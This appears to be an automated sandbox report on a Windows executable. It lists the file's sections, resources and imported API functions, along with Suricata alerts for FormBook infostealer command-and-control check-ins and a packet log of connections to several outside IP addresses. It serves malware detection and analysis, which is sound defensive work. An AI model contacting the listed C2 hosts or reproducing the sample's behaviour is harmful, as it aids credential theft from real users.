                                                .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0xd40000x6f3cc0x6f400630e6d0e92f95a7448e8884d237fcf99False0.8017490344101124data7.4855565575544105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x1440000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0xd43500x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                RT_ICON0xd44780x16b70Device independent bitmap graphic, 150 x 300 x 32, image size 90000EnglishGreat Britain0.10503009458297506
                                                RT_STRING0xeafe80x594dataEnglishGreat Britain0.3333333333333333
                                                RT_STRING0xeb57c0x68adataEnglishGreat Britain0.2735961768219833
                                                RT_STRING0xebc080x490dataEnglishGreat Britain0.3715753424657534
                                                RT_STRING0xec0980x5fcdataEnglishGreat Britain0.3087467362924282
                                                RT_STRING0xec6940x65cdataEnglishGreat Britain0.34336609336609336
                                                RT_STRING0xeccf00x466dataEnglishGreat Britain0.3605683836589698
                                                RT_STRING0xed1580x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                RT_RCDATA0xed2b00x55c27data1.00033022936707
                                                RT_GROUP_ICON0x142ed80x14dataEnglishGreat Britain1.25
                                                RT_GROUP_ICON0x142eec0x14dataEnglishGreat Britain1.15
                                                RT_VERSION0x142f000xdcdataEnglishGreat Britain0.6181818181818182
                                                RT_MANIFEST0x142fdc0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                Imports

                                                DLLImport
                                                WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                PSAPI.DLLGetProcessMemoryInfo
                                                IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                UxTheme.dllIsThemeActive
                                                KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishGreat Britain

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2025-01-11T06:54:42.343238+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45002446.38.243.23480TCP
                                                2025-01-11T06:54:42.343238+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45002446.38.243.23480TCP
                                                2025-01-11T06:55:28.274099+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44973647.83.1.9080TCP
                                                2025-01-11T06:55:28.274099+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44973647.83.1.9080TCP
                                                2025-01-11T06:55:44.858916+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44978947.83.1.9080TCP
                                                2025-01-11T06:55:47.405795+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44980547.83.1.9080TCP
                                                2025-01-11T06:55:49.952696+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44982547.83.1.9080TCP
                                                2025-01-11T06:55:52.580528+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44984247.83.1.9080TCP
                                                2025-01-11T06:55:52.580528+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44984247.83.1.9080TCP
                                                2025-01-11T06:55:58.437669+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449882185.151.30.22380TCP
                                                2025-01-11T06:56:00.988683+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449899185.151.30.22380TCP
                                                2025-01-11T06:56:03.565517+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449915185.151.30.22380TCP
                                                2025-01-11T06:56:06.120981+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449928185.151.30.22380TCP
                                                2025-01-11T06:56:06.120981+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449928185.151.30.22380TCP
                                                2025-01-11T06:56:12.053749+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449968176.57.65.7680TCP
                                                2025-01-11T06:56:14.744445+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449988176.57.65.7680TCP
                                                2025-01-11T06:56:17.764973+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450005176.57.65.7680TCP
                                                2025-01-11T06:56:19.683968+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450016176.57.65.7680TCP
                                                2025-01-11T06:56:19.683968+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450016176.57.65.7680TCP
                                                2025-01-11T06:56:25.298946+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450017209.74.79.4180TCP
                                                2025-01-11T06:56:27.861751+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450018209.74.79.4180TCP
                                                2025-01-11T06:56:30.418867+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450019209.74.79.4180TCP
                                                2025-01-11T06:56:32.949886+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450020209.74.79.4180TCP
                                                2025-01-11T06:56:32.949886+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450020209.74.79.4180TCP
                                                2025-01-11T06:56:39.530934+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002146.38.243.23480TCP
                                                2025-01-11T06:56:42.077713+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002246.38.243.23480TCP
                                                2025-01-11T06:56:44.624617+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002346.38.243.23480TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 11, 2025 06:55:26.645617962 CET4973680192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:26.650449991 CET804973647.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:26.650536060 CET4973680192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:26.670206070 CET4973680192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:26.676326036 CET804973647.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:28.273789883 CET804973647.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:28.274049044 CET804973647.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:28.274099112 CET4973680192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:28.279648066 CET4973680192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:28.284514904 CET804973647.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:43.334768057 CET4978980192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:43.339718103 CET804978947.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:43.342349052 CET4978980192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:43.356867075 CET4978980192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:43.361737967 CET804978947.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:44.858916044 CET4978980192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:44.863899946 CET804978947.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:44.863971949 CET4978980192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:45.877547979 CET4980580192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:45.883393049 CET804980547.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:45.885066986 CET4980580192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:45.902787924 CET4980580192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:45.907708883 CET804980547.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:47.405795097 CET4980580192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:47.412300110 CET804980547.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:47.412384987 CET4980580192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:48.424403906 CET4982580192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:48.429229021 CET804982547.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:48.429544926 CET4982580192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:48.444037914 CET4982580192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:48.450006008 CET804982547.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:48.450021029 CET804982547.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:48.450046062 CET804982547.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:48.450057983 CET804982547.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:48.450072050 CET804982547.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:48.450090885 CET804982547.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:48.450103045 CET804982547.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:48.450114965 CET804982547.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:48.450130939 CET804982547.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:49.952696085 CET4982580192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:49.958148003 CET804982547.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:49.958266973 CET4982580192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:50.977791071 CET4984280192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:50.982863903 CET804984247.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:50.982949972 CET4984280192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:50.992594957 CET4984280192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:50.997441053 CET804984247.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:52.580343008 CET804984247.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:52.580367088 CET804984247.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:52.580528021 CET4984280192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:52.583429098 CET4984280192.168.2.447.83.1.90
                                                Jan 11, 2025 06:55:52.588248968 CET804984247.83.1.90192.168.2.4
                                                Jan 11, 2025 06:55:57.662815094 CET4988280192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:55:57.668303967 CET8049882185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:55:57.668380022 CET4988280192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:55:57.683901072 CET4988280192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:55:57.688766003 CET8049882185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:55:58.437335014 CET8049882185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:55:58.437621117 CET8049882185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:55:58.437669039 CET4988280192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:55:59.187009096 CET4988280192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:00.206137896 CET4989980192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:00.210975885 CET8049899185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:00.211074114 CET4989980192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:00.226214886 CET4989980192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:00.231118917 CET8049899185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:00.988415956 CET8049899185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:00.988481998 CET8049899185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:00.988682985 CET4989980192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:01.733966112 CET4989980192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:02.763073921 CET4991580192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:02.767987013 CET8049915185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:02.768420935 CET4991580192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:02.783718109 CET4991580192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:02.788573027 CET8049915185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:02.788603067 CET8049915185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:02.788613081 CET8049915185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:02.788651943 CET8049915185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:02.788656950 CET8049915185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:02.788682938 CET8049915185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:02.788686991 CET8049915185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:02.788784027 CET8049915185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:02.788794041 CET8049915185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:03.564677954 CET8049915185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:03.565464973 CET8049915185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:03.565516949 CET4991580192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:04.296416998 CET4991580192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:05.315331936 CET4992880192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:05.320173025 CET8049928185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:05.322011948 CET4992880192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:05.329883099 CET4992880192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:05.334703922 CET8049928185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:06.120812893 CET8049928185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:06.120857954 CET8049928185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:06.120980978 CET4992880192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:06.124346018 CET4992880192.168.2.4185.151.30.223
                                                Jan 11, 2025 06:56:06.129173040 CET8049928185.151.30.223192.168.2.4
                                                Jan 11, 2025 06:56:11.361875057 CET4996880192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:11.366727114 CET8049968176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:11.366825104 CET4996880192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:11.381519079 CET4996880192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:11.386401892 CET8049968176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:12.053580999 CET8049968176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:12.053699017 CET8049968176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:12.053749084 CET4996880192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:12.890583038 CET4996880192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:13.917036057 CET4998880192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:13.922013044 CET8049988176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:13.922108889 CET4998880192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:13.942823887 CET4998880192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:13.947874069 CET8049988176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:14.744049072 CET8049988176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:14.744388103 CET8049988176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:14.744445086 CET4998880192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:15.452717066 CET4998880192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:16.471626043 CET5000580192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:16.476622105 CET8050005176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:16.476778030 CET5000580192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:16.492037058 CET5000580192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:16.492074013 CET5000580192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:16.497870922 CET8050005176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:16.497884035 CET8050005176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:16.497932911 CET8050005176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:16.497941971 CET8050005176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:16.497977018 CET8050005176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:16.497986078 CET8050005176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:16.497997999 CET8050005176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:16.499003887 CET8050005176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:16.499018908 CET8050005176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:17.764714956 CET8050005176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:17.764879942 CET8050005176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:17.764972925 CET5000580192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:17.999583960 CET5000580192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:19.018285990 CET5001680192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:19.023566008 CET8050016176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:19.024456978 CET5001680192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:19.033027887 CET5001680192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:19.037786961 CET8050016176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:19.683763981 CET8050016176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:19.683828115 CET8050016176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:19.683968067 CET5001680192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:19.686676979 CET5001680192.168.2.4176.57.65.76
                                                Jan 11, 2025 06:56:19.691458941 CET8050016176.57.65.76192.168.2.4
                                                Jan 11, 2025 06:56:24.713368893 CET5001780192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:24.718193054 CET8050017209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:24.718297005 CET5001780192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:24.734296083 CET5001780192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:24.739083052 CET8050017209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:25.298573971 CET8050017209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:25.298639059 CET8050017209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:25.298945904 CET5001780192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:26.249771118 CET5001780192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:27.268661976 CET5001880192.168.2.4209.74.79.41
                                                Jan 11, 2025 06:56:27.273493052 CET8050018209.74.79.41192.168.2.4
                                                Jan 11, 2025 06:56:27.273598909 CET5001880192.168.2.4209.74.79.41
